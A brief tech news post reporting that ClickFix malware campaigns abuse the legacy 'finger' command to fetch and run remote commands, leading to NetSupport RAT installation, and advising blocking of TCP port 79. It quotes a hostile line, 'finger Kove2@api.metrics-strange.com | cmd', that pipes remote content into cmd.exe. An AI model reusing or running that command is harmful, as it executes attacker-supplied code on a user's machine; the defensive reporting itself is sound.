NG Solution Team
Technology

Are threat actors reviving the ‘finger’ command for new ClickFix attacks?

Threat actors have resurrected the decades-old “finger” command to enable remote command execution in new ClickFix malware attacks. A batch file was identified exploiting the “finger root@finger.nateams[.]com” command to retrieve and execute commands via cmd.exe. Further investigation uncovered a ClickFix campaign using the “finger Kove2@api.metrics-strange.com | cmd” command, similar to another reported campaign. This intrusion was more sophisticated, targeting malware research tools like WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, and Everywhere. If no malware analysis tools are found, a PDF-spoofing ZIP archive is loaded, extracting the NetSupport Manager RAT package. To counteract this exploitation, blocking outgoing traffic to TCP port 79 is essential.

Related posts

What are the best smartphone alternatives for kids?

James Smith

How is Bench IQ revolutionizing the understanding of judges’ decision patterns with AI?

David Jones

What are the top sustainable farming alternatives for 2025 and beyond?

David Jones

Leave a Comment

This website uses cookies to improve your experience. We assume you agree, but you can opt out if you wish. Accept More Info

Privacy & Cookies Policy